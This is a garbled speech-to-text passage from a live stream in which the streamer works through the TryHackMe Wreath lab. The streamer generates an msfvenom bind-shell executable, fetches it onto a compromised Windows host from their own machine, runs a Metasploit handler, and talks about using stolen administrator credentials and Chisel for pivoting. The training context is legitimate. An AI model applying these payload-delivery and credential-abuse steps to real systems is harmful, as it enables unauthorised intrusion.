bed. Pretty soon. So let's go ahead and try to, within documents, we can try to upload a shell.exe, a reverse shell, right? And it's going to be a MSF Venom Windows shell bind TCP. We'll do it on port, we'll just say 8443. Alright, remote host is going to be 10.200.107. What is this guy? .100 or 37.100, right? So we're doing a Windows x64 shell bind TCP, right? It's going to be called shell.exe. That's in Wreath, like right there. We're going to have to copy that over to the other one, I believe, into Holo, because I messed up. I wonder if I can just do an upload Wreath. I can't go in and try hack me. Try hack me. Wreath shell.exe. Let's do that. Yep, okay, so he's uploaded there now, right? Let's go ahead and do a quick wget hp 10.200.73.200, right? That's in down here. 8888/shell.exe. Stack out file will be shell.exe. And we'll go ahead and background him. He did get it. We got 200 response down there. We'll background this guy, and then we'll do a use exploit, or we'll do a use set payload to this payload, the Windows x64 shell bind TCP, right? Set L port to 8443. Set our host to 10.200.37.100. We're going to run that, and then we're going to / shell.exe. And let's see if we actually get anything back over here. Because I want to create an interpreter session, but it doesn't look like we're going to be able to. Poops McGee. I really want to get an interpreter session back, which I feel like I did last time also. What's your IP address? That's not going to work. IP config. Yeah. 10.273.150. Well, obviously it's not going to work because I said .100, so it's obviously not going to work. So that was really stupid of me now, wasn't it? .150. Let's make that again. Let's set our host to .150. Let's go ahead and session stack I, sessions 4, shell. I don't know why I just went there. That's not going to do anything for me. Yes. Let's go ahead and Control C, move tech RF shell.exe, and we'll go ahead and we'll throw it back on there again. And we'll upload from home Cali, desktop, try-hack-me, Wreath, shell.exe. Upload that again, and we will go ahead and do a delete shell.exe, and we will go ahead and we will run that again. I guess I'm not allowed to delete him for some reason. Okay, whatever. We're just going to go ahead and we're just going to wget him again. That should overwrite the other one, and it didn't because it didn't feel like it. So we're going to say outfile shell1.exe, and from here now we're going to go ahead and we are going to run shell1.exe. Let's go ahead and Control Z, yes, and show options. Make sure that's set to 150. We'll go ahead and we'll run that, and let's try to run this guy up here and see if we get anything back over here. Oh my God! Look at what I'm getting tired. You can tell. That our host 10.200.73.150. I didn't do 37 down here, did I? I did. Oh my God, I'm getting tired. Alright, after this is going to be like my last thing right here. Especially if the pivot works. Well, if the pivot works, we might just keep going. But, kind of don't want to. These are the mistakes that you make when you are tired. So everyone pay attention, please. Okay, because this is the mistakes that you make when you are tired, alright? What the hell? Home Kelly desktop. What was that? Try-hack-me. Wreath shell.exe, and we'll call this one shell 2, I guess. You know, even if we get it this time, it's your first try. We'll say that. We'll say first try. We'll run that, and we'll do a /shell.shell2.exe. Let's see if that works. I don't know what the hell's going on over here. Let's try it again. don't know why I keep getting command session, shell session closed. That's weird. NC to 10.273.150 8443. Alright, so I think this is going to be about it for tonight for this guy right here. So thank you for everyone that stuck around. Everything. This was a long one. One of the boxes broke during it, but we are pretty set for future ones, especially since we do have an actual username and password now, so we can utilize that next time we come in, right? Let me make sure that I actually saved it, and I did. Okay, so we do have Res Evil, and he is an administrator. So we do have an actual username and password now, and now we can start to use Chisel and things like that and start to try to get through everything, right? Let me go ahead and send you guys to somebody else. See if anybody else is on InfoSec streams. Let's see here. Oh yeah, we got Security Weekly and we got Purple Byte 1. I'm going to go ahead and send you guys over to Purple Byte 1. So yeah, thanks a lot for coming in. Thanks a lot for sticking around, showing up and everything. You guys are awesome as usual. Thanks for chatting. And yeah,